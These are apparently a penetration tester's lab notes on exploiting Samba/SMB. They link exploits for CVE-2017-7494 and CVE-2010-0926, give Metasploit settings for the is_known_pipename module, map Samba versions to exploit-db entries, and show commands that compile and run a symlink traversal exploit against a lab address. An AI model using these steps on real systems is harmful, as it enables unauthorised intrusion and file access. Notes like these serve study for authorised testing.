https://github.com/opsxcq/exploit-CVE-2017-7494
https://github.com/joxeankoret/CVE-2017-7494
(msf)linux/samba/is_known_pipename
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1
srv2.sys SMB Code Execution MS09-050
Check MS09-050 in windows
[windows exploits](:/1cd2495e7c114135b2a16848042f6f30)
SMB version
# server type: 0x9a03
# v 2.2.x
https://github.com/offensive-security/exploitdb/blob/master/exploits/linux/remote/7.pl
# server type: 0x809a03
# v 3.0.24
https://github.com/mikaelkall/HackingAllTheThings/tree/master/exploit/linux/remote/CVE-2010-0926_smb_symlink_traversal
$ gcc CVE-2010-0926.c -o exploit
$ ./exploit 10.11.1.136 "<SHARE>" /kashz /
Attempt to access / through symlink /kashz from Windows or smbclient.